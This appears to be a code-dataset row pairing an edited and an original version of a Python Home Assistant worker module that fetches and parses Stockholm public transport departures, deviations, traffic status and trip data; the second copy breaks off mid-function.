edited_code
stringlengths
17
978k
original_code
stringlengths
17
978k
import logging import jsonpickle import isodate import time from datetime import datetime from homeassistant.util.dt import now from custom_components.hasl3.slapi import ( slapi_fp, slapi_tl2, slapi_ri4, slapi_si2, slapi_rp3, ) logger = logging.getLogger("custom_components.hasl3.worker") class HASLStatus(object): """System Status.""" startup_in_progress = True running_background_tasks = False class HASLData(object): tl2 = {} si2 = {} ri4 = {} rp3 = {} rp3keys = {} si2keys = {} ri4keys = {} fp = {} def dump(self): return { 'si2keys': self.si2keys, 'ri4keys': self.ri4keys, 'tl2': self.tl2, 'si2': self.si2, 'ri4': self.ri4, 'fp': self.fp } class HASLInstances(object): """The instance holder object object""" instances = {} instanceCount = 0 def add(self, id, updater): self.instances[id] = { 'subscriber': updater } self.instanceCount += 1 def remove(self, id): try: self.instances[id]['subscriber']() self.instanceCount -= 1 del self.instances[id] except Exception as e: logger.debug( f"Error occured while unregistering listener {str(e)}") def count(self): return self.instanceCount class HaslWorker(object): """HaslWorker.""" hass = None configuration = None status = HASLStatus() data = HASLData() instances = HASLInstances() @staticmethod def init(hass, configuration): """Return a initialized HaslWorker object.""" return HaslWorker() def debugdump(self, data): logger.debug("[debug_dump] Entered") try: timestring = time.strftime("%Y%m%d%H%M%S") outputfile = self.hass.config.path(f"hasl_debug_{timestring}.json") jsonFile = open(outputfile, "w") jsonFile.write(jsonpickle.dumps(data, unpicklable=False)) jsonFile.close() logger.debug("[debug_dump] Completed") except: logger.debug("[debug_dump] A processing error occured") def getminutesdiff(self, d1, d2): d1 = datetime.strptime(d1, "%Y-%m-%d %H:%M:%S") d2 = datetime.strptime(d2, "%Y-%m-%d %H:%M:%S") diff = (d1 - d2).total_seconds() logger.debug(f"[get_minutes_diff] diff {diff}, d1 {d1}, d2 {d2}") return diff def checksensorstate(self, sensor, state, default=True): logger.debug("[check_sensor_state] Entered") if sensor is not None and not sensor == "": try: sensor_state = self.hass.states.get(sensor) if sensor_state.state is state: logger.debug("[check_sensor_state] Completed will return TRUE/ENABLED") return True else: logger.debug("[check_sensor_state] Completed will return FALSE/DISABLED") return False except: logger.debug("[check_sensor_state] An error occured, default will be returned") return default else: logger.debug("[check_sensor_state] No sensor specified, will return default") return default async def assert_rp3(self, key, source, destination): logger.debug("[assert_rp3] Entered") listvalue = f"{source}-{destination}" if key not in self.data.rp3keys: logger.debug("[assert_rp3] Registered key") self.data.rp3keys[key] = { "api_key": key, "trips": "" } else: logger.debug("[assert_rp3] Key already present") currentvalue = self.data.rp3keys[key]['trips'] if currentvalue == "": logger.debug("[assert_rp3] Creating trip key") self.data.rp3keys[key]["trips"] = listvalue else: logger.debug("[assert_rp3] Amending to trip key") self.data.rp3keys[key]["trips"] = f"{currentvalue}|{listvalue}" if listvalue not in self.data.rp3: logger.debug("[assert_rp3] Creating default values") self.data.rp3[listvalue] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending", "trips": [] } logger.debug("[assert_rp3] Completed") return def parseDepartureTime(self, t): """ weird time formats from the API, do some quick and dirty conversions. """ try: if t == 'Nu': return 0 s = t.split() if len(s) > 1 and s[1] == 'min': return int(s[0]) s = t.split(':') if len(s) > 1: rightnow = now() min = int(s[0]) * 60 + int(s[1]) - ( (rightnow.hour * 60) + rightnow.minute) if min < 0: min = min + 1440 return min except: return return async def process_rp3(self): logger.debug("[process_rp3] Entered") for rp3key in list(self.data.rp3keys): logger.debug(f"[process_rp3] Processing key {rp3key}") rp3data = self.data.rp3keys[rp3key] api = slapi_rp3(rp3key) for tripname in '|'.join(set(rp3data["trips"].split('|'))).split('|'): logger.debug(f"[process_rp3] Processing trip {tripname}") newdata = self.data.rp3[tripname] positions = tripname.split('-') try: apidata = {} srcLocID = '' dstLocID = '' srcLocLat = '' srcLocLng = '' dstLocLat = '' dstLocLng = '' if "," in positions[0]: srcLoc = positions[0].split(',') srcLocLat = srcLoc[0] srcLocLng = srcLoc[1] else: srcLocID = positions[0] if "," in positions[1]: dstLoc = positions[1].split(',') dstLocLat = dstLoc[0] dstLocLng = dstLoc[1] else: dstLocID = positions[1] apidata = await api.request(srcLocID, dstLocID, srcLocLat, srcLocLng, dstLocLat, dstLocLng) newdata['trips'] = [] # Parse every trip for trip in apidata["Trip"]: newtrip = { 'fares': [], 'legs': [] } # Loop all fares and add for fare in trip['TariffResult']['fareSetItem'][0]['fareItem']: newfare = {} newfare['name'] = fare['name'] newfare['desc'] = fare['desc'] newfare['price'] = int(fare['price']) / 100 newtrip['fares'].append(newfare) # Add legs to trips for leg in trip['LegList']['Leg']: newleg = {} # Walking is done by humans. # And robots. # Robots are scary. if leg["type"] == "WALK": newleg['name'] = leg['name'] newleg['line'] = 'Walk' newleg['direction'] = 'Walk' newleg['category'] = 'WALK' else: newleg['name'] = leg['Product']['name'] newleg['line'] = leg['Product']['line'] newleg['direction'] = leg['direction'] newleg['category'] = leg['category'] newleg['from'] = leg['Origin']['name'] newleg['to'] = leg['Destination']['name'] newleg['time'] = f"{leg["Origin"]["date"]} {leg["Origin"]["time"]}" if leg.get('Stops'): if leg['Stops'].get('Stop', {}): newleg['stops'] = [] for stop in leg.get('Stops', {}).get('Stop', {}): newleg['stops'].append(stop) newtrip['legs'].append(newleg) # Make some shortcuts for data newtrip['first_leg'] = newtrip['legs'][0]['name'] newtrip['time'] = newtrip['legs'][0]['time'] newtrip['price'] = newtrip['fares'][0]['price'] newtrip['duration'] = str(isodate.parse_duration(trip['duration'])) newtrip['transfers'] = trip['transferCount'] newdata['trips'].append(newtrip) # Add shortcuts to info in the first trip if it exists firstLegFirstTrip = next((x for x in newdata['trips'][0]['legs'] if x["category"] != "WALK"), []) lastLegLastTrip = next((x for x in reversed(newdata['trips'][0]['legs']) if x["category"] != "WALK"), []) newdata['transfers'] = sum(p["category"] != "WALK" for p in newdata['trips'][0]['legs']) - 1 or 0 newdata['price'] = newdata['trips'][0]['price'] or '' newdata['time'] = newdata['trips'][0]['time'] or '' newdata['duration'] = newdata['trips'][0]['duration'] or '' newdata['from'] = newdata['trips'][0]['legs'][0]['from'] or '' newdata['to'] = newdata['trips'][0]['legs'][len(newdata['trips'][0]['legs']) - 1]['to'] or '' newdata['origin'] = {} newdata['origin']['leg'] = firstLegFirstTrip["name"] or '' newdata['origin']['line'] = firstLegFirstTrip["line"] or '' newdata['origin']['direction'] = firstLegFirstTrip["direction"] or '' newdata['origin']['category'] = firstLegFirstTrip["category"] or '' newdata['origin']['time'] = firstLegFirstTrip["time"] or '' newdata['origin']['from'] = firstLegFirstTrip["from"] or '' newdata['origin']['to'] = firstLegFirstTrip["to"] or '' newdata['destination'] = {} newdata['destination']['leg'] = lastLegLastTrip["name"] or '' newdata['destination']['line'] = lastLegLastTrip["line"] or '' newdata['destination']['direction'] = lastLegLastTrip["direction"] or '' newdata['destination']['category'] = lastLegLastTrip["category"] or '' newdata['destination']['time'] = lastLegLastTrip["time"] or '' newdata['destination']['from'] = lastLegLastTrip["from"] or '' newdata['destination']['to'] = lastLegLastTrip["to"] or '' newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" except Exception as e: logger.debug(f"[process_rp3] Error occured: {str(e)}") newdata['api_result'] = "Error" newdata['api_error'] = str(e) newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.rp3[tripname] = newdata logger.debug(f"[process_rp3] Completed trip {tripname}") logger.debug(f"[process_rp3] Completed key {rp3key}") logger.debug("[process_rp3] Completed") async def assert_fp(self, traintype): logger.debug("[assert_fp] Entered") if traintype not in self.data.fp: logger.debug(f"[assert_fp] Registering {traintype}") self.data.fp[traintype] = { "api_type": "slapi-fp1", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug(f"[assert_fp] {traintype} already registered") logger.debug("[assert_fp] Completed") return async def process_fp(self, notarealarg=None): logger.debug("[process_rp3] Entered") api = slapi_fp() for traintype in list(self.data.fp): logger.debug(f"[process_rp3] Processing {traintype}") newdata = self.data.fp[traintype] try: newdata['data'] = await api.request(traintype) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_rp3] Completed {traintype}") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_rp3] Error occured for {traintype}: {str(e)}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.fp[traintype] = newdata logger.debug("[process_rp3] Completed") async def assert_si2_stop(self, key, stop): await self.assert_si2(key, f"stop_{stop}", "stops", stop) async def assert_si2_line(self, key, line): await self.assert_si2(key, f"line_{line}", "lines", line) async def assert_si2(self, key, datakey, listkey, listvalue): logger.debug("[assert_si2] Entered") if key not in self.data.si2keys: logger.debug("[assert_si2] Registering key") self.data.si2keys[key] = { "api_key": key, "stops": "", "lines": "" } else: logger.debug("[assert_si2] Key already present") if self.data.si2keys[key][listkey] == "": logger.debug("[assert_si2] Creating trip key") self.data.si2keys[key][listkey] = listvalue else: logger.debug("[assert_si2] Appending to trip key") self.data.si2keys[key][listkey] = f"{self.data.si2keys[key][listkey]},{listvalue}" if datakey not in self.data.si2: logger.debug("[assert_si2] Creating default values") self.data.si2[datakey] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_si2] Completed") return async def process_si2(self, notarealarg=None): logger.debug("[process_si2] Entered") for si2key in list(self.data.si2keys): logger.debug(f"[process_si2] Processing key {si2key}") si2data = self.data.si2keys[si2key] api = slapi_si2(si2key, 60) for stop in ','.join(set(si2data["stops"].split(','))).split(','): logger.debug(f"[process_si2] Processing stop {stop}") newdata = self.data.si2[f"stop_{stop}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request(stop, '') deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing stop {stop} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of stop {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"stop_{stop}"] = newdata logger.debug( f"[process_si2] Completed processing of stop {stop}") for line in ','.join(set(si2data["lines"].split(','))).split(','): logger.debug(f"[process_si2] Processing line {line}") newdata = self.data.si2[f"line_{line}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request('', line) deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing line {line} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of line {line}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"line_{line}"] = newdata logger.debug(f"[process_si2] Completed processing of line {line}") logger.debug(f"[process_si2] Completed processing key {si2key}") logger.debug("[process_si2] Completed") return async def assert_ri4(self, key, stop): logger.debug("[assert_ri4] Entered") stopkey = str(stop) if key not in self.data.ri4keys: logger.debug("[assert_ri4] Registering key and stop") self.data.ri4keys[key] = { "api_key": key, "stops": stopkey } else: logger.debug("[assert_ri4] Adding stop to existing key") self.data.ri4keys[key]["stops"] = f"{self.data.ri4keys[key]["stops"]},{stopkey}" if stop not in self.data.ri4: logger.debug("[assert_ri4] Creating default data") self.data.ri4[stopkey] = { "api_type": "slapi-ri4", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_ri4] Completed") return async def process_ri4(self, notarealarg=None): logger.debug("[process_ri4] Entered") iconswitcher = { 'Buses': 'mdi:bus', 'Trams': 'mdi:tram', 'Ships': 'mdi:ferry', 'Metros': 'mdi:subway-variant', 'Trains': 'mdi:train', } for ri4key in list(self.data.ri4keys): logger.debug(f"[process_ri4] Processing key {ri4key}") ri4data = self.data.ri4keys[ri4key] api = slapi_ri4(ri4key, 60) for stop in ','.join(set(ri4data["stops"].split(','))).split(','): logger.debug(f"[process_ri4] Processing stop {stop}") newdata = self.data.ri4[stop] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: departures = [] departuredata = await api.request(stop) departuredata = departuredata['ResponseData'] for (i, traffictype) in enumerate(['Metros', 'Buses', 'Trains', 'Trams', 'Ships']): for (idx, value) in enumerate( departuredata[traffictype]): direction = value['JourneyDirection'] or 0 displaytime = value['DisplayTime'] or '' destination = value['Destination'] or '' linenumber = value['LineNumber'] or '' expected = value['ExpectedDateTime'] or '' groupofline = value['GroupOfLine'] or '' icon = iconswitcher.get(traffictype, 'mdi:train-car') diff = self.parseDepartureTime(displaytime) departures.append({ 'line': linenumber, 'direction': direction, 'departure': displaytime, 'destination': destination, 'time': diff, 'expected': datetime.strptime( expected, '%Y-%m-%dT%H:%M:%S' ), 'type': traffictype, 'groupofline': groupofline, 'icon': icon, }) newdata['data'] = sorted(departures, key=lambda k: k['time']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_ri4] Stop {stop} updated sucessfully") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_ri4] Error occured during update {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.ri4[stop] = newdata logger.debug(f"[process_ri4] Completed stop {stop}") logger.debug(f"[process_ri4] Completed key {ri4key}") logger.debug("[process_ri4] Completed") return async def assert_tl2(self, key): logger.debug("[assert_tl2] Entered") if key not in self.data.tl2: logger.debug("[assert_tl2] Registering key") self.data.tl2[key] = { "api_type": "slapi-tl2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug("[assert_tl2] Key already present") logger.debug("[assert_tl2] Completed") return async def process_tl2(self, notarealarg=None): logger.debug("[process_tl2] Entered") for tl2key in list(self.data.tl2): logger.debug(f"[process_tl2] Processing {tl2key}") newdata = self.data.tl2[tl2key] statuses = { 'EventGood': 'Good', 'EventMinor': 'Minor', 'EventMajor': 'Closed', 'EventPlanned': 'Planned', } # Icon table used for HomeAssistant. statusIcons = { 'EventGood': 'mdi:check', 'EventMinor': 'mdi:clock-alert-outline', 'EventMajor': 'mdi:close', 'EventPlanned': 'mdi:triangle-outline' } try: api = slapi_tl2(tl2key) apidata = await api.request() apidata = apidata['ResponseData']['TrafficTypes'] responselist = {} for response in apidata: statustype = ('ferry' if response['Type'] == 'fer' else response['Type']) for event in response['Events']: event['Status'] = statuses.get(event['StatusIcon']) event['StatusIcon'] = \ statusIcons.get(event['StatusIcon']) responsedata = { 'status': statuses.get(response['StatusIcon']), 'status_icon': statusIcons.get(response['StatusIcon']), 'events': response['Events'] } responselist[statustype] = responsedata # Attribution and update sensor data. newdata['data'] = responselist newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_tl2] Update of {tl2key} succeeded") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_tl2] Update of {tl2key} failed") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.tl2[tl2key] = newdata logger.debug(f"[process_tl2] Completed {tl2key}") logger.debug("[process_tl2] Completed") return
import logging import jsonpickle import isodate import time from datetime import datetime from homeassistant.util.dt import now from custom_components.hasl3.slapi import ( slapi_fp, slapi_tl2, slapi_ri4, slapi_si2, slapi_rp3, ) logger = logging.getLogger("custom_components.hasl3.worker") class HASLStatus(object): """System Status.""" startup_in_progress = True running_background_tasks = False class HASLData(object): tl2 = {} si2 = {} ri4 = {} rp3 = {} rp3keys = {} si2keys = {} ri4keys = {} fp = {} def dump(self): return { 'si2keys': self.si2keys, 'ri4keys': self.ri4keys, 'tl2': self.tl2, 'si2': self.si2, 'ri4': self.ri4, 'fp': self.fp } class HASLInstances(object): """The instance holder object object""" instances = {} instanceCount = 0 def add(self, id, updater): self.instances[id] = { 'subscriber': updater } self.instanceCount += 1 def remove(self, id): try: self.instances[id]['subscriber']() self.instanceCount -= 1 del self.instances[id] except Exception as e: logger.debug( f"Error occured while unregistering listener {str(e)}") def count(self): return self.instanceCount class HaslWorker(object): """HaslWorker.""" hass = None configuration = None status = HASLStatus() data = HASLData() instances = HASLInstances() @staticmethod def init(hass, configuration): """Return a initialized HaslWorker object.""" return HaslWorker() def debugdump(self, data): logger.debug("[debug_dump] Entered") try: timestring = time.strftime("%Y%m%d%H%M%S") outputfile = self.hass.config.path(f"hasl_debug_{timestring}.json") jsonFile = open(outputfile, "w") jsonFile.write(jsonpickle.dumps(data, unpicklable=False)) jsonFile.close() logger.debug("[debug_dump] Completed") except: logger.debug("[debug_dump] A processing error occured") def getminutesdiff(self, d1, d2): d1 = datetime.strptime(d1, "%Y-%m-%d %H:%M:%S") d2 = datetime.strptime(d2, "%Y-%m-%d %H:%M:%S") diff = (d1 - d2).total_seconds() logger.debug(f"[get_minutes_diff] diff {diff}, d1 {d1}, d2 {d2}") return diff def checksensorstate(self, sensor, state, default=True): logger.debug("[check_sensor_state] Entered") if sensor is not None and not sensor == "": try: sensor_state = self.hass.states.get(sensor) if sensor_state.state is state: logger.debug("[check_sensor_state] Completed will return TRUE/ENABLED") return True else: logger.debug("[check_sensor_state] Completed will return FALSE/DISABLED") return False except: logger.debug("[check_sensor_state] An error occured, default will be returned") return default else: logger.debug("[check_sensor_state] No sensor specified, will return default") return default async def assert_rp3(self, key, source, destination): logger.debug("[assert_rp3] Entered") listvalue = f"{source}-{destination}" if key not in self.data.rp3keys: logger.debug("[assert_rp3] Registered key") self.data.rp3keys[key] = { "api_key": key, "trips": "" } else: logger.debug("[assert_rp3] Key already present") currentvalue = self.data.rp3keys[key]['trips'] if currentvalue == "": logger.debug("[assert_rp3] Creating trip key") self.data.rp3keys[key]["trips"] = listvalue else: logger.debug("[assert_rp3] Amending to trip key") self.data.rp3keys[key]["trips"] = f"{currentvalue}|{listvalue}" if listvalue not in self.data.rp3: logger.debug("[assert_rp3] Creating default values") self.data.rp3[listvalue] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending", "trips": [] } logger.debug("[assert_rp3] Completed") return def parseDepartureTime(self, t): """ weird time formats from the API, do some quick and dirty conversions. """ try: if t == 'Nu': return 0 s = t.split() if len(s) > 1 and s[1] == 'min': return int(s[0]) s = t.split(':') if len(s) > 1: rightnow = now() min = int(s[0]) * 60 + int(s[1]) - ( (rightnow.hour * 60) + rightnow.minute) if min < 0: min = min + 1440 return min except: return return async def process_rp3(self): logger.debug("[process_rp3] Entered") for rp3key in list(self.data.rp3keys): logger.debug(f"[process_rp3] Processing key {rp3key}") rp3data = self.data.rp3keys[rp3key] api = slapi_rp3(rp3key) for tripname in '|'.join(set(rp3data["trips"].split('|'))).split('|'): logger.debug(f"[process_rp3] Processing trip {tripname}") newdata = self.data.rp3[tripname] positions = tripname.split('-') try: apidata = {} srcLocID = '' dstLocID = '' srcLocLat = '' srcLocLng = '' dstLocLat = '' dstLocLng = '' if "," in positions[0]: srcLoc = positions[0].split(',') srcLocLat = srcLoc[0] srcLocLng = srcLoc[1] else: srcLocID = positions[0] if "," in positions[1]: dstLoc = positions[1].split(',') dstLocLat = dstLoc[0] dstLocLng = dstLoc[1] else: dstLocID = positions[1] apidata = await api.request(srcLocID, dstLocID, srcLocLat, srcLocLng, dstLocLat, dstLocLng) newdata['trips'] = [] # Parse every trip for trip in apidata["Trip"]: newtrip = { 'fares': [], 'legs': [] } # Loop all fares and add for fare in trip['TariffResult']['fareSetItem'][0]['fareItem']: newfare = {} newfare['name'] = fare['name'] newfare['desc'] = fare['desc'] newfare['price'] = int(fare['price']) / 100 newtrip['fares'].append(newfare) # Add legs to trips for leg in trip['LegList']['Leg']: newleg = {} # Walking is done by humans. # And robots. # Robots are scary. if leg["type"] == "WALK": newleg['name'] = leg['name'] newleg['line'] = 'Walk' newleg['direction'] = 'Walk' newleg['category'] = 'WALK' else: newleg['name'] = leg['Product']['name'] newleg['line'] = leg['Product']['line'] newleg['direction'] = leg['direction'] newleg['category'] = leg['category'] newleg['from'] = leg['Origin']['name'] newleg['to'] = leg['Destination']['name'] newleg['time'] = f"{leg['Origin']['date']} {leg['Origin']['time']}" if leg.get('Stops'): if leg['Stops'].get('Stop', {}): newleg['stops'] = [] for stop in leg.get('Stops', {}).get('Stop', {}): newleg['stops'].append(stop) newtrip['legs'].append(newleg) # Make some shortcuts for data newtrip['first_leg'] = newtrip['legs'][0]['name'] newtrip['time'] = newtrip['legs'][0]['time'] newtrip['price'] = newtrip['fares'][0]['price'] newtrip['duration'] = str(isodate.parse_duration(trip['duration'])) newtrip['transfers'] = trip['transferCount'] newdata['trips'].append(newtrip) # Add shortcuts to info in the first trip if it exists firstLegFirstTrip = next((x for x in newdata['trips'][0]['legs'] if x["category"] != "WALK"), []) lastLegLastTrip = next((x for x in reversed(newdata['trips'][0]['legs']) if x["category"] != "WALK"), []) newdata['transfers'] = sum(p["category"] != "WALK" for p in newdata['trips'][0]['legs']) - 1 or 0 newdata['price'] = newdata['trips'][0]['price'] or '' newdata['time'] = newdata['trips'][0]['time'] or '' newdata['duration'] = newdata['trips'][0]['duration'] or '' newdata['from'] = newdata['trips'][0]['legs'][0]['from'] or '' newdata['to'] = newdata['trips'][0]['legs'][len(newdata['trips'][0]['legs']) - 1]['to'] or '' newdata['origin'] = {} newdata['origin']['leg'] = firstLegFirstTrip["name"] or '' newdata['origin']['line'] = firstLegFirstTrip["line"] or '' newdata['origin']['direction'] = firstLegFirstTrip["direction"] or '' newdata['origin']['category'] = firstLegFirstTrip["category"] or '' newdata['origin']['time'] = firstLegFirstTrip["time"] or '' newdata['origin']['from'] = firstLegFirstTrip["from"] or '' newdata['origin']['to'] = firstLegFirstTrip["to"] or '' newdata['destination'] = {} newdata['destination']['leg'] = lastLegLastTrip["name"] or '' newdata['destination']['line'] = lastLegLastTrip["line"] or '' newdata['destination']['direction'] = lastLegLastTrip["direction"] or '' newdata['destination']['category'] = lastLegLastTrip["category"] or '' newdata['destination']['time'] = lastLegLastTrip["time"] or '' newdata['destination']['from'] = lastLegLastTrip["from"] or '' newdata['destination']['to'] = lastLegLastTrip["to"] or '' newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" except Exception as e: logger.debug(f"[process_rp3] Error occured: {str(e)}") newdata['api_result'] = "Error" newdata['api_error'] = str(e) newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.rp3[tripname] = newdata logger.debug(f"[process_rp3] Completed trip {tripname}") logger.debug(f"[process_rp3] Completed key {rp3key}") logger.debug("[process_rp3] Completed") async def assert_fp(self, traintype): logger.debug("[assert_fp] Entered") if traintype not in self.data.fp: logger.debug(f"[assert_fp] Registering {traintype}") self.data.fp[traintype] = { "api_type": "slapi-fp1", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug(f"[assert_fp] {traintype} already registered") logger.debug("[assert_fp] Completed") return async def process_fp(self, notarealarg=None): logger.debug("[process_rp3] Entered") api = slapi_fp() for traintype in list(self.data.fp): logger.debug(f"[process_rp3] Processing {traintype}") newdata = self.data.fp[traintype] try: newdata['data'] = await api.request(traintype) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_rp3] Completed {traintype}") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_rp3] Error occured for {traintype}: {str(e)}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.fp[traintype] = newdata logger.debug("[process_rp3] Completed") async def assert_si2_stop(self, key, stop): await self.assert_si2(key, f"stop_{stop}", "stops", stop) async def assert_si2_line(self, key, line): await self.assert_si2(key, f"line_{line}", "lines", line) async def assert_si2(self, key, datakey, listkey, listvalue): logger.debug("[assert_si2] Entered") if key not in self.data.si2keys: logger.debug("[assert_si2] Registering key") self.data.si2keys[key] = { "api_key": key, "stops": "", "lines": "" } else: logger.debug("[assert_si2] Key already present") if self.data.si2keys[key][listkey] == "": logger.debug("[assert_si2] Creating trip key") self.data.si2keys[key][listkey] = listvalue else: logger.debug("[assert_si2] Appending to trip key") self.data.si2keys[key][listkey] = f"{self.data.si2keys[key][listkey]},{listvalue}" if datakey not in self.data.si2: logger.debug("[assert_si2] Creating default values") self.data.si2[datakey] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_si2] Completed") return async def process_si2(self, notarealarg=None): logger.debug("[process_si2] Entered") for si2key in list(self.data.si2keys): logger.debug(f"[process_si2] Processing key {si2key}") si2data = self.data.si2keys[si2key] api = slapi_si2(si2key, 60) for stop in ','.join(set(si2data["stops"].split(','))).split(','): logger.debug(f"[process_si2] Processing stop {stop}") newdata = self.data.si2[f"stop_{stop}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request(stop, '') deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing stop {stop} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of stop {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"stop_{stop}"] = newdata logger.debug( f"[process_si2] Completed processing of stop {stop}") for line in ','.join(set(si2data["lines"].split(','))).split(','): logger.debug(f"[process_si2] Processing line {line}") newdata = self.data.si2[f"line_{line}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request('', line) deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing line {line} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of line {line}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"line_{line}"] = newdata logger.debug(f"[process_si2] Completed processing of line {line}") logger.debug(f"[process_si2] Completed processing key {si2key}") logger.debug("[process_si2] Completed") return async def assert_ri4(self, key, stop): logger.debug("[assert_ri4] Entered") stopkey = str(stop) if key not in self.data.ri4keys: logger.debug("[assert_ri4] Registering key and stop") self.data.ri4keys[key] = { "api_key": key, "stops": stopkey } else: logger.debug("[assert_ri4] Adding stop to existing key") self.data.ri4keys[key]["stops"] = f"{self.data.ri4keys[key]['stops']},{stopkey}" if stop not in self.data.ri4: logger.debug("[assert_ri4] Creating default data") self.data.ri4[stopkey] = { "api_type": "slapi-ri4", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_ri4] Completed") return async def process_ri4(self, notarealarg=None): logger.debug("[process_ri4] Entered") iconswitcher = { 'Buses': 'mdi:bus', 'Trams': 'mdi:tram', 'Ships': 'mdi:ferry', 'Metros': 'mdi:subway-variant', 'Trains': 'mdi:train', } for ri4key in list(self.data.ri4keys): logger.debug(f"[process_ri4] Processing key {ri4key}") ri4data = self.data.ri4keys[ri4key] api = slapi_ri4(ri4key, 60) for stop in ','.join(set(ri4data["stops"].split(','))).split(','): logger.debug(f"[process_ri4] Processing stop {stop}") newdata = self.data.ri4[stop] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: departures = [] departuredata = await api.request(stop) departuredata = departuredata['ResponseData'] for (i, traffictype) in enumerate(['Metros', 'Buses', 'Trains', 'Trams', 'Ships']): for (idx, value) in enumerate( departuredata[traffictype]): direction = value['JourneyDirection'] or 0 displaytime = value['DisplayTime'] or '' destination = value['Destination'] or '' linenumber = value['LineNumber'] or '' expected = value['ExpectedDateTime'] 